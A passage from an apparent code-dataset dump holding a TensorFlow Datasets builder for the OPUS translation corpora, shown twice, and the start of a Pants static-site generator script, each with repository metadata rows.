languages=["ace", "af", "ak", "am", "an", "ang", "ar", "ar_SY", "ary", "as", "ast", "az", "ba", "bal", "be", "bem", "ber", "bg", "bho", "bn", "bn_IN", "bo", "br", "brx", "bs", "bua", "byn", "ca", "ce", "ceb", "chr", "ckb", "co", "crh", "cs", "csb", "cv", "cy", "da", "de", "de_AT", "de_DE", "dsb", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_AF", "ff", "fi", "fil", "fo", "fr", "fr_CA", "fr_FR", "frm", "frp", "fur", "fy", "ga", "gd", "gl", "gn", "grc", "gu", "guc", "gv", "ha", "haw", "he", "hi", "hil", "hne", "hr", "hsb", "ht", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "iu", "ja", "jbo", "jv", "ka", "kab", "kg", "kk", "kl", "km", "kn", "ko", "kok", "ks", "ksh", "ku", "kw", "ky", "la", "lb", "lg", "li", "lij", "lld", "ln", "lo", "lt", "ltg", "lv", "mai", "mg", "mh", "mhr", "mi", "miq", "mk", "ml", "mn", "mo", "mr", "ms", "mt", "mus", "my", "nan", "nap", "nb", "nds", "ne", "nhn", "nl", "nl_NL", "nn", "no", "nso", "ny", "oc", "oj", "om", "or", "os", "pa", "pam", "pap", "pl", "pms", "pmy", "ps", "pt", "pt_BR", "pt_PT", "qu", "rm", "ro", "rom", "ru", "rw", "sa", "sc", "sco", "sd", "se", "shn", "shs", "si", "sk", "sl", "sm", "sml", "sn", "so", "son", "sq", "sr", "st", "sv", "sw", "syr", "szl", "ta", "ta_LK", "te", "tet", "tg", "th", "ti", "tk", "tl", "tlh", "tr", "trv", "ts", "tt", "ug", "uk", "ur", "uz", "ve", "vec", "vi", "wa", "wae", "wo", "xal", "xh", "yi", "yo", "zh", "zh_CN", "zh_HK", "zh_TW", "zu", "zza"]
),
SubDataset(
name="OpenOffice",
description="A collection of documents from http://www.openoffice.org/.",
homepage="http://opus.nlpl.eu/OpenOffice-v2.php",
url="http://opus.nlpl.eu/download.php?f=OpenOffice/v2/moses/",
languages=["de", "en", "es", "fr", "jp", "sv"]
),
SubDataset(
name="OpenSubtitles",
description="A new collection of translated movie subtitles from http://www.opensubtitles.org/",
homepage="http://opus.nlpl.eu/OpenSubtitles-v2018.php",
url="http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/",
languages=["af", "ar", "bg", "bn", "br", "bs", "ca", "cs", "da", "de", "el", "en", "eo", "es", "et", "eu", "fa", "fi", "fr", "gl", "he", "hi", "hr", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "ko", "lt", "lv", "mk", "ml", "ms", "nl", "no", "pl", "pt", "pt_br", "ro", "ru", "si", "sk", "sl", "sq", "sr", "sv", "ta", "te", "th", "tl", "tr", "uk", "ur", "vi", "ze_en", "ze_zh", "zh_cn", "zh_tw"]
)
]}
class OpusConfig(tfds.core.BuilderConfig):
"""BuilderConfig for Opus."""
def __init__(self, *, language_pair, subsets, **kwargs):
"""BuilderConfig for Opus.
Args:
language_pair: `(string, string)`, pair of languages used for translation.
Should contain 2 letter coded strings (e.g. "de", "en")
subsets: `<list>(string)`, list of the subdatasets to use.
**kwargs: keyword arguments forwarded to super.
"""
sorted_language_pair = sorted(language_pair)
name = kwargs.get("name", "%s-%s for %s" % (
sorted_language_pair[0], sorted_language_pair[1], ", ".join(subsets)))
description = name + " documents"
super(OpusConfig, self).__init__(
description=description, **dict(kwargs, name=name))
self.language_pair = sorted_language_pair
self.subsets = subsets
class Opus(tfds.core.GeneratorBasedBuilder):
"""OPUS is a collection of translated texts from the web."""
_KK_SUBSETS = [
("medical", ["EMEA"]),
("law", ["JRC-Acquis"]),
("koran", ["Tanzil"]),
("IT", ["GNOME", "KDE4", "PHP", "Ubuntu", "OpenOffice"]),
("subtitles", ["OpenSubtitles"])
]
"""The following configurations reproduce the evaluation tasks from "Six
Challenges for Neural Machine Translation" by Philipp Koehn and Rebecca
Knowles (2017) https://www.aclweb.org/anthology/W17-3204.pdf"""
BUILDER_CONFIGS = [
OpusConfig( # pylint:disable=g-complex-comprehension
version=tfds.core.Version("0.1.0"),
language_pair=("de", "en"),
subsets=subsets,
name=name
) for name, subsets in _KK_SUBSETS
]
@property
def subsets(self):
# Return only the datasets that exist for the language pair.
source, target = self.builder_config.language_pair
filtered_subsets = []
for dataset in [DATASET_MAP[name] for name in self.builder_config.subsets]:
if (source, target) in dataset.language_pairs:
filtered_subsets.append(dataset)
return filtered_subsets
def _info(self):
src, target = self.builder_config.language_pair
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION + "\n" + self.builder_config.description,
features=tfds.features.Translation(
languages=self.builder_config.language_pair),
supervised_keys=(src, target),
homepage="http://opus.nlpl.eu/",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
source, target = self.builder_config.language_pair
file_ext = "%s-%s"%(source, target)
subsets = []
for item in self.subsets:
dl_dir = dl_manager.download_and_extract(
os.path.join(item.url, "%s.txt.zip"%file_ext))
source_file = os.path.join(
dl_dir, "%s.%s.%s"%(item.name, file_ext, source))
target_file = os.path.join(
dl_dir, "%s.%s.%s"%(item.name, file_ext, target))
subsets.append({
"name": item.name,
"source_file": source_file,
"target_file": target_file
})
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={"subsets": subsets}
)
]
def _generate_examples(self, subsets):
source, target = self.builder_config.language_pair
for item in subsets:
logging.info("Generating examples from: %s", item["name"])
source_file = item["source_file"]
target_file = item["target_file"]
gens = [_gen_line(source_file), _gen_line(target_file)]
for idx, (source_sent, target_sent) in enumerate(zip(*gens)):
result = {source: source_sent, target: target_sent}
if all(result.values()):
key = "%s/%d"%(item["name"], idx)
yield key, result
def _gen_line(filename):
"""Returns sentences from an OPUS data file."""
with tf.io.gfile.GFile(filename) as f:
for line in f:
yield line
| 51.717054 | 1,652 | 0.562092 |
import os
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_CITATION = """
@inproceedings{Tiedemann2012ParallelData,
author = {Tiedemann, J},
title = {Parallel Data, Tools and Interfaces in OPUS},
booktitle = {LREC}
year = {2012}}
"""
_DESCRIPTION = """
OPUS is a collection of translated texts from the web.
Create your own config to choose which data / language pair to load.
```
config = tfds.translate.opus.OpusConfig(
version=tfds.core.Version('0.1.0'),
language_pair=("de", "en"),
subsets=["GNOME", "EMEA"]
)
builder = tfds.builder("opus", config=config)
```
"""
class SubDataset():
def __init__(self, name, description, homepage, url, languages):
self.name = name
self.description = description
self.homepage = homepage
self.url = url
sorted_languages = sorted(languages)
language_pairs = []
for idx, source in enumerate(sorted_languages):
for target in sorted_languages[idx + 1:]:
language_pairs.append((source, target))
self.language_pairs = language_pairs
DATASET_MAP = {ds.name: ds for ds in [
SubDataset(
name="EMEA",
description="A parallel corpus made out of PDF documents from the European Medicines Agency.",
homepage="http://opus.nlpl.eu/EMEA.php",
url="http://opus.nlpl.eu/download.php?f=EMEA/v3/moses/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="JRC-Acquis",
description="A collection of legislative text of the European Union and currently comprises selected texts written between the 1950s and now.",
homepage="http://opus.nlpl.eu/JRC-Acquis.php",
url="http://opus.nlpl.eu/download.php?f=JRC-Acquis/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="Tanzil",
description="A collection of Quran translations compiled by the Tanzil project.",
homepage="http://opus.nlpl.eu/Tanzil.php",
url="http://opus.nlpl.eu/download.php?f=Tanzil/v1/moses/",
languages=["am", "ar", "az", "bg", "bn", "bs", "cs", "de", "dv", "en", "es", "fa", "fr", "ha", "hi", "id", "it", "ja", "ko", "ku", "ml", "ms", "nl", "no", "pl", "pt", "ro", "ru", "sd", "so", "sq", "sv", "sw", "ta", "tg", "th", "tr", "tt", "ug", "ur", "uz", "zh"]
),
SubDataset(
name="GNOME",
description="A parallel corpus of GNOME localization files. Source: https://l10n.gnome.org",
homepage="http://opus.nlpl.eu/GNOME.php",
url="http://opus.nlpl.eu/download.php?f=GNOME/v1/moses/",
languages=["af", "am", "an", "ang", "ar", "ar_TN", "ara", "as", "ast", "az", "az_IR", "bal", "be", "bem", "bg", "bg_BG", "bn", "bn_IN", "bo", "br", "brx", "bs", "ca", "cat", "crh", "cs", "csb", "cy", "da", "da_DK", "de", "de_CH", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "en_ZA", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_IR", "fi", "fo", "foo", "fr", "fur", "fy", "ga", "gd", "gl", "gn", "gr", "gu", "gv", "ha", "he", "hi", "hi_IN", "hr", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "it_IT", "ja", "jbo", "ka", "kg", "kk", "km", "kn", "ko", "kr", "ks", "ku", "ky", "la", "lg", "li", "lo", "lt", "lv", "mai", "mg", "mi", "mk", "ml", "mn", "mr", "ms", "ms_MY", "mt", "mus", "my", "nb", "nb_NO", "nds", "ne", "nhn", "nl", "nn", "nn_NO", "no", "no_nb", "nqo", "nr", "nso", "oc", "or", "os", "pa", "pl", "ps", "pt", "pt_BR", "pt_PT", "quz", "ro", "ru", "rw", "si", "sk", "sl", "so", "sq", "sr", "sr_ME", "st", "sv", "sw", "szl", "ta", "te", "tg", "tg_TJ", "th", "tk", "tl", "tl_PH", "tmp", "tr", "tr_TR", "ts", "tt", "ug", "uk", "ur", "ur_PK", "uz", "vi", "vi_VN", "wa", "xh", "yi", "yo", "zh_CN", "zh_HK", "zh_TW", "zu"]
),
SubDataset(
name="KDE4",
description="A parallel corpus of KDE4 localization files (v.2).",
homepage="http://opus.nlpl.eu/KDE4.php",
url="http://opus.nlpl.eu/download.php?f=KDE4/v2/moses/",
languages=["af", "ar", "as", "ast", "be", "bg", "bn", "bn_IN", "br", "ca", "crh", "cs", "csb", "cy", "da", "de", "el", "en", "en_GB", "eo", "es", "et", "eu", "fa", "fi", "fr", "fy", "ga", "gl", "gu", "ha", "he", "hi", "hne", "hr", "hsb", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "km", "kn", "ko", "ku", "lb", "lt", "lv", "mai", "mk", "ml", "mr", "ms", "mt", "nb", "nds", "ne", "nl", "nn", "nso", "oc", "or", "pa", "pl", "ps", "pt", "pt_BR", "ro", "ru", "rw", "se", "si", "sk", "sl", "sr", "sv", "ta", "te", "tg", "th", "tr", "uk", "uz", "vi", "wa", "xh", "zh_CN", "zh_HK", "zh_TW"]
),
SubDataset(
name="PHP",
description="A parallel corpus originally extracted from http://se.php.net/download-docs.php.",
homepage="http://opus.nlpl.eu/PHP.php",
url="http://opus.nlpl.eu/download.php?f=PHP/v1/moses/",
languages=["cs", "de", "en", "es", "fi", "fr", "he", "hu", "it", "ja", "ko", "nl", "pl", "pt_BR", "ro", "ru", "sk", "sl", "sv", "tr", "tw", "zh", "zh_TW"]
),
SubDataset(
name="Ubuntu",
description="A parallel corpus of Ubuntu localization files. Source: https://translations.launchpad.net",
homepage="http://opus.nlpl.eu/Ubuntu.php",
url="http://opus.nlpl.eu/download.php?f=Ubuntu/v14.10/moses/",
languages=["ace", "af", "ak", "am", "an", "ang", "ar", "ar_SY", "ary", "as", "ast", "az", "ba", "bal", "be", "bem", "ber", "bg", "bho", "bn", "bn_IN", "bo", "br", "brx", "bs", "bua", "byn", "ca", "ce", "ceb", "chr", "ckb", "co", "crh", "cs", "csb", "cv", "cy", "da", "de", "de_AT", "de_DE", "dsb", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_AF", "ff", "fi", "fil", "fo", "fr", "fr_CA", "fr_FR", "frm", "frp", "fur", "fy", "ga", "gd", "gl", "gn", "grc", "gu", "guc", "gv", "ha", "haw", "he", "hi", "hil", "hne", "hr", "hsb", "ht", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "iu", "ja", "jbo", "jv", "ka", "kab", "kg", "kk", "kl", "km", "kn", "ko", "kok", "ks", "ksh", "ku", "kw", "ky", "la", "lb", "lg", "li", "lij", "lld", "ln", "lo", "lt", "ltg", "lv", "mai", "mg", "mh", "mhr", "mi", "miq", "mk", "ml", "mn", "mo", "mr", "ms", "mt", "mus", "my", "nan", "nap", "nb", "nds", "ne", "nhn", "nl", "nl_NL", "nn", "no", "nso", "ny", "oc", "oj", "om", "or", "os", "pa", "pam", "pap", "pl", "pms", "pmy", "ps", "pt", "pt_BR", "pt_PT", "qu", "rm", "ro", "rom", "ru", "rw", "sa", "sc", "sco", "sd", "se", "shn", "shs", "si", "sk", "sl", "sm", "sml", "sn", "so", "son", "sq", "sr", "st", "sv", "sw", "syr", "szl", "ta", "ta_LK", "te", "tet", "tg", "th", "ti", "tk", "tl", "tlh", "tr", "trv", "ts", "tt", "ug", "uk", "ur", "uz", "ve", "vec", "vi", "wa", "wae", "wo", "xal", "xh", "yi", "yo", "zh", "zh_CN", "zh_HK", "zh_TW", "zu", "zza"]
),
SubDataset(
name="OpenOffice",
description="A collection of documents from http://www.openoffice.org/.",
homepage="http://opus.nlpl.eu/OpenOffice-v2.php",
url="http://opus.nlpl.eu/download.php?f=OpenOffice/v2/moses/",
languages=["de", "en", "es", "fr", "jp", "sv"]
),
SubDataset(
name="OpenSubtitles",
description="A new collection of translated movie subtitles from http://www.opensubtitles.org/",
homepage="http://opus.nlpl.eu/OpenSubtitles-v2018.php",
url="http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/",
languages=["af", "ar", "bg", "bn", "br", "bs", "ca", "cs", "da", "de", "el", "en", "eo", "es", "et", "eu", "fa", "fi", "fr", "gl", "he", "hi", "hr", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "ko", "lt", "lv", "mk", "ml", "ms", "nl", "no", "pl", "pt", "pt_br", "ro", "ru", "si", "sk", "sl", "sq", "sr", "sv", "ta", "te", "th", "tl", "tr", "uk", "ur", "vi", "ze_en", "ze_zh", "zh_cn", "zh_tw"]
)
]}
class OpusConfig(tfds.core.BuilderConfig):
def __init__(self, *, language_pair, subsets, **kwargs):
sorted_language_pair = sorted(language_pair)
name = kwargs.get("name", "%s-%s for %s" % (
sorted_language_pair[0], sorted_language_pair[1], ", ".join(subsets)))
description = name + " documents"
super(OpusConfig, self).__init__(
description=description, **dict(kwargs, name=name))
self.language_pair = sorted_language_pair
self.subsets = subsets
class Opus(tfds.core.GeneratorBasedBuilder):
_KK_SUBSETS = [
("medical", ["EMEA"]),
("law", ["JRC-Acquis"]),
("koran", ["Tanzil"]),
("IT", ["GNOME", "KDE4", "PHP", "Ubuntu", "OpenOffice"]),
("subtitles", ["OpenSubtitles"])
]
BUILDER_CONFIGS = [
OpusConfig(
version=tfds.core.Version("0.1.0"),
language_pair=("de", "en"),
subsets=subsets,
name=name
) for name, subsets in _KK_SUBSETS
]
@property
def subsets(self):
source, target = self.builder_config.language_pair
filtered_subsets = []
for dataset in [DATASET_MAP[name] for name in self.builder_config.subsets]:
if (source, target) in dataset.language_pairs:
filtered_subsets.append(dataset)
return filtered_subsets
def _info(self):
src, target = self.builder_config.language_pair
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION + "\n" + self.builder_config.description,
features=tfds.features.Translation(
languages=self.builder_config.language_pair),
supervised_keys=(src, target),
homepage="http://opus.nlpl.eu/",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
source, target = self.builder_config.language_pair
file_ext = "%s-%s"%(source, target)
subsets = []
for item in self.subsets:
dl_dir = dl_manager.download_and_extract(
os.path.join(item.url, "%s.txt.zip"%file_ext))
source_file = os.path.join(
dl_dir, "%s.%s.%s"%(item.name, file_ext, source))
target_file = os.path.join(
dl_dir, "%s.%s.%s"%(item.name, file_ext, target))
subsets.append({
"name": item.name,
"source_file": source_file,
"target_file": target_file
})
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={"subsets": subsets}
)
]
def _generate_examples(self, subsets):
source, target = self.builder_config.language_pair
for item in subsets:
logging.info("Generating examples from: %s", item["name"])
source_file = item["source_file"]
target_file = item["target_file"]
gens = [_gen_line(source_file), _gen_line(target_file)]
for idx, (source_sent, target_sent) in enumerate(zip(*gens)):
result = {source: source_sent, target: target_sent}
if all(result.values()):
key = "%s/%d"%(item["name"], idx)
yield key, result
def _gen_line(filename):
with tf.io.gfile.GFile(filename) as f:
for line in f:
yield line
| true | true |
1c2cc24b8fafab54aaa4c0912bcd55b0fd7489ec | 14,237 | py | Python | pants-plugins/src/python/internal_backend/sitegen/tasks/sitegen.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-12-10T21:31:02.000Z | 2018-12-10T21:31:02.000Z | pants-plugins/src/python/internal_backend/sitegen/tasks/sitegen.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 2 | 2016-10-13T21:37:42.000Z | 2018-07-20T20:14:33.000Z | pants-plugins/src/python/internal_backend/sitegen/tasks/sitegen.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-03-08T22:21:44.000Z | 2018-03-08T22:21:44.000Z | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import collections
import json
import os
import re
import shutil
from datetime import datetime
from pystache import Renderer
from six.moves import range
from pants.backend.docgen.tasks.generate_pants_reference import GeneratePantsReference
from pants.backend.docgen.tasks.markdown_to_html import MarkdownToHtml
from pants.base.exceptions import TaskError
from pants.task.task import Task
"""Static Site Generator for the Pants Build documentation site.
Suggested use:
cd pants
./build-support/bin/publish_docs.sh # invokes sitegen.py
"""
def beautiful_soup(*args, **kwargs):
"""Indirection function so we can lazy-import bs4.
It's an expensive import that invokes re.compile a lot, so we don't want to incur that cost
unless we must.
"""
import bs4
return bs4.BeautifulSoup(*args, **kwargs)
class SiteGen(Task):
"""Generate the Pants static web site."""
@classmethod
def register_options(cls, register):
super(SiteGen, cls).register_options(register)
register('--config-path', type=list, help='Path to .json file describing site structure.')
# FIXME(cosmicexplorer): requiring these products ensures that the markdown
# and reference tasks run before this one, but we don't use those
# products.
@classmethod
def prepare(cls, options, round_manager):
round_manager.require(MarkdownToHtml.MARKDOWN_HTML_PRODUCT)
round_manager.require_data(GeneratePantsReference.PANTS_REFERENCE_PRODUCT)
round_manager.require_data(GeneratePantsReference.BUILD_DICTIONARY_PRODUCT)
def execute(self):
if not self.get_options().config_path:
raise TaskError('The config_path option must be specified, e.g., with the --config-path flag')
for config_path in self.get_options().config_path:
config = load_config(config_path)
soups = load_soups(config)
precomputed = precompute(config, soups)
transform_soups(config, soups, precomputed)
template = load_template(config)
write_en_pages(config, soups, precomputed, template)
copy_extras(config)
def load_config(json_path):
"""Load config info from a .json file and return it."""
with open(json_path) as json_file:
config = json.loads(json_file.read().decode('utf8'))
# sanity-test the config:
assert(config['tree'][0]['page'] == 'index')
return config
def load_soups(config):
"""Generate BeautifulSoup AST for each page listed in config."""
soups = {}
for page, path in config['sources'].items():
with open(path, 'rb') as orig_file:
soups[page] = beautiful_soup(orig_file.read().decode('utf-8'))
return soups
class Precomputed(object):
"""Info we compute (and preserve) before we mutate things."""
def __init__(self, page, pantsref):
"""
:param page: dictionary of per-page precomputed info
:param pantsref: dictionary of pantsrefs {'foo': 'path/to/page.html#fooref', ...}
"""
self.page = page
self.pantsref = pantsref
class PrecomputedPageInfo(object):
"""Info we compute (and preserve) for each page before we mutate things."""
def __init__(self, title, show_toc):
"""
:param title: Page title
:param show_toc: True iff we should show a toc for this page.
"""
self.title = title
self.show_toc = show_toc
self.toc = []
def precompute_pantsrefs(soups):
"""Return links for <a pantsmark="foo"> tags. Mutates soups to give needed ids.
If we see <a pantsref="foo">something</a>, that's a link whose destination is
a <a pantsmark="foo"> </a> tag, perhaps on some other tag. To stitch these
together, we scan the docset to find all the pantsmarks. If an pantsmark does not
yet have an id to anchor, we give it one.
Return value dictionary maps pantsrefs to locations:
{ "foo": "path/to/foo.html#fooref", "bar": "other/page.html#barref", ...}
"""
accumulator = {}
for (page, soup) in soups.items():
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all('a'):
if tag.has_attr('pantsmark'):
pantsmark = tag['pantsmark']
if pantsmark in accumulator:
raise TaskError('pantsmarks are unique but "{0}" appears in {1} and {2}'
.format(pantsmark, page, accumulator[pantsmark]))
# To link to a place "mid-page", we need an HTML anchor.
# If this tag already has such an anchor, use it.
# Else, make one up.
anchor = tag.get('id') or tag.get('name')
if not anchor:
anchor = pantsmark
while anchor in existing_anchors:
count += 1
anchor = '{0}_{1}'.format(pantsmark, count)
tag['id'] = anchor
existing_anchors = find_existing_anchors(soup)
link = '{0}.html#{1}'.format(page, anchor)
accumulator[pantsmark] = link
return accumulator
def precompute(config, soups):
"""Return info we want to compute (and preserve) before we mutate things."""
show_toc = config.get('show_toc', {})
page = {}
pantsrefs = precompute_pantsrefs(soups)
for p, soup in soups.items():
title = get_title(soup) or p
page[p] = PrecomputedPageInfo(title=title, show_toc=show_toc.get(p, True))
return Precomputed(page=page, pantsref=pantsrefs)
def fixup_internal_links(config, soups):
"""Find href="..." links that link to pages in our docset; fix them up.
We don't preserve relative paths between files as we copy-transform them
from source to dest. So adjust the paths to work with new locations.
"""
# Pages can come from different dirs; they can go to different dirs.
# Thus, there's some relative-path-computing here.
reverse_directory = {}
for d, s in config['sources'].items():
reverse_directory[s] = d
for name, soup in soups.items():
old_src_dir = os.path.dirname(config['sources'][name])
for tag in soup.find_all(True):
if not 'href' in tag.attrs: continue
old_rel_path = tag['href'].split('#')[0]
old_dst = os.path.normpath(os.path.join(old_src_dir, old_rel_path))
if not old_dst in reverse_directory: continue
new_dst = reverse_directory[old_dst] + '.html'
new_rel_path = rel_href(name, new_dst)
# string replace instead of assign to not loose anchor in foo.html#anchor
tag['href'] = tag['href'].replace(old_rel_path, new_rel_path, 1)
_heading_re = re.compile('^h[1-6]$') # match heading tag names h1,h2,h3,...
def rel_href(src, dst):
"""For src='foo/bar.html', dst='garply.html#frotz' return relative link '../garply.html#frotz'.
"""
src_dir = os.path.dirname(src)
return os.path.relpath(dst, src_dir)
def find_existing_anchors(soup):
"""Return existing ids (and names) from a soup."""
existing_anchors = set()
for tag in soup.find_all(True):
for attr in ['id', 'name']:
if tag.has_attr(attr):
existing_anchors.add(tag.get(attr))
return existing_anchors
def ensure_headings_linkable(soups):
"""foreach soup, foreach h1,h2,etc, if no id=... or name=..., give it one.
Enables tables of contents.
"""
for soup in soups.values():
ensure_page_headings_linkable(soup)
def ensure_page_headings_linkable(soup):
# To avoid re-assigning an existing id, note 'em down.
# Case-insensitve because distinguishing links #Foo and #foo would be weird.
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all(_heading_re):
if not (tag.has_attr('id') or tag.has_attr('name')):
snippet = ''.join([c for c in tag.text if c.isalpha()])[:20]
while True:
count += 1
candidate_id = 'heading_{0}_{1}'.format(snippet, count).lower()
if not candidate_id in existing_anchors:
existing_anchors.add(candidate_id)
tag['id'] = candidate_id
break
def link_pantsrefs(soups, precomputed):
"""Transorm soups: <a pantsref="foo"> becomes <a href="../foo_page.html#foo">"""
for (page, soup) in soups.items():
for a in soup.find_all('a'):
if a.has_attr('pantsref'):
pantsref = a['pantsref']
if not pantsref in precomputed.pantsref:
raise TaskError('Page {0} has pantsref "{1}" and I cannot find pantsmark for'
' it'.format(page, pantsref))
a['href'] = rel_href(page, precomputed.pantsref[pantsref])
def transform_soups(config, soups, precomputed):
"""Mutate our soups to be better when we write them out later."""
fixup_internal_links(config, soups)
ensure_headings_linkable(soups)
# Do this after ensure_headings_linkable so that there will be links.
generate_page_tocs(soups, precomputed)
link_pantsrefs(soups, precomputed)
def get_title(soup):
"""Given a soup, pick out a title"""
if soup.title: return soup.title.string
if soup.h1: return soup.h1.string
return ''
def generate_site_toc(config, precomputed, here):
site_toc = []
def recurse(tree, depth_so_far):
for node in tree:
if 'collapsible_heading' in node and 'pages' in node:
heading = node['collapsible_heading']
pages = node['pages']
links = []
collapse_open = False
for cur_page in pages:
html_filename = '{}.html'.format(cur_page)
page_is_here = cur_page == here
if page_is_here:
link = html_filename
collapse_open = True
else:
link = os.path.relpath(html_filename, os.path.dirname(here))
links.append(dict(link=link, text=precomputed.page[cur_page].title, here=page_is_here))
site_toc.append(dict(depth=depth_so_far, links=links, dropdown=True, heading=heading, id=heading.replace(' ', '-'), open=collapse_open))
if 'heading' in node:
heading = node['heading']
site_toc.append(dict(depth=depth_so_far, links=None, dropdown=False, heading=heading, id=heading.replace(' ', '-')))
if 'pages' in node and not 'collapsible_heading' in node:
pages = node['pages']
links = []
for cur_page in pages:
html_filename = '{}.html'.format(cur_page)
page_is_here = cur_page == here
if page_is_here:
link = html_filename
else:
link = os.path.relpath(html_filename, os.path.dirname(here))
links.append(dict(link=link, text=precomputed.page[cur_page].title, here=page_is_here))
site_toc.append(dict(depth=depth_so_far, links=links, dropdown=False, heading=None, id=heading.replace(' ', '-')))
if 'children' in node:
recurse(node['children'], depth_so_far + 1)
if 'tree' in config:
recurse(config['tree'], 0)
return site_toc
def hdepth(tag):
"""Compute an h tag's "outline depth".
E.g., h1 at top level is 1, h1 in a section is 2, h2 at top level is 2.
"""
if not _heading_re.search(tag.name):
raise TaskError('Can\'t compute heading depth of non-heading {0}'.format(tag))
depth = int(tag.name[1], 10) # get the 2 from 'h2'
cursor = tag
while cursor:
if cursor.name == 'section':
depth += 1
cursor = cursor.parent
return depth
def generate_page_tocs(soups, precomputed):
for name, soup in soups.items():
if precomputed.page[name].show_toc:
precomputed.page[name].toc = generate_page_toc(soup)
def generate_page_toc(soup):
"""Return page-level (~list of headings) TOC template data for soup"""
# Maybe we don't want to show all the headings. E.g., it's common for a page
# to have just one H1, a title at the top. Our heuristic: if a page has just
# one heading of some outline level, don't show it.
found_depth_counts = collections.defaultdict(int)
for tag in soup.find_all(_heading_re):
if (tag.get('id') or tag.get('name')):
found_depth_counts[hdepth(tag)] += 1
depth_list = [i for i in range(100) if 1 < found_depth_counts[i]]
depth_list = depth_list[:4]
toc = []
for tag in soup.find_all(_heading_re):
depth = hdepth(tag)
if depth in depth_list:
toc.append(dict(depth=depth_list.index(depth) + 1,
link=tag.get('id') or tag.get('name'),
text=tag.text))
return toc
def generate_generated(config, here):
return('{0} {1}'.format(config['sources'][here],
datetime.now().isoformat()))
def render_html(dst, config, soups, precomputed, template):
soup = soups[dst]
renderer = Renderer()
title = precomputed.page[dst].title
topdots = ('../' * dst.count('/'))
if soup.body:
body_html = '{0}'.format(soup.body)
else:
body_html = '{0}'.format(soup)
html = renderer.render(template,
body_html=body_html,
generated=generate_generated(config, dst),
site_toc=generate_site_toc(config, precomputed, dst),
has_page_toc=bool(precomputed.page[dst].toc),
page_path=dst,
page_toc=precomputed.page[dst].toc,
title=title,
topdots=topdots)
return html
def write_en_pages(config, soups, precomputed, template):
outdir = config['outdir']
for dst in soups:
html = render_html(dst, config, soups, precomputed, template)
dst_path = os.path.join(outdir, dst + '.html')
dst_dir = os.path.dirname(dst_path)
if not os.path.isdir(dst_dir):
os.makedirs(dst_dir)
with open(dst_path, 'wb') as f:
f.write(html.encode('utf-8'))
def copy_extras(config):
"""copy over "extra" files named in config json: stylesheets, logos, ..."""
outdir = config['outdir']
for dst, src in config['extras'].items():
dst_path = os.path.join(outdir, dst)
dst_dir = os.path.dirname(dst_path)
if not os.path.isdir(dst_dir):
os.makedirs(dst_dir)
shutil.copy(src, dst_path)
def load_template(config):
"""Return text of template file specified in config"""
with open(config['template'], 'rb') as template_file:
template = template_file.read().decode('utf-8')
return template
| 35.240099 | 144 | 0.667416 |
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import collections
import json
import os
import re
import shutil
from datetime import datetime
from pystache import Renderer
from six.moves import range
from pants.backend.docgen.tasks.generate_pants_reference import GeneratePantsReference
from pants.backend.docgen.tasks.markdown_to_html import MarkdownToHtml
from pants.base.exceptions import TaskError
from pants.task.task import Task
def beautiful_soup(*args, **kwargs):
import bs4
return bs4.BeautifulSoup(*args, **kwargs)
class SiteGen(Task):
@classmethod
def register_options(cls, register):
super(SiteGen, cls).register_options(register)
register('--config-path', type=list, help='Path to .json file describing site structure.')
# products.
@classmethod
def prepare(cls, options, round_manager):
round_manager.require(MarkdownToHtml.MARKDOWN_HTML_PRODUCT)
round_manager.require_data(GeneratePantsReference.PANTS_REFERENCE_PRODUCT)
round_manager.require_data(GeneratePantsReference.BUILD_DICTIONARY_PRODUCT)
def execute(self):
if not self.get_options().config_path:
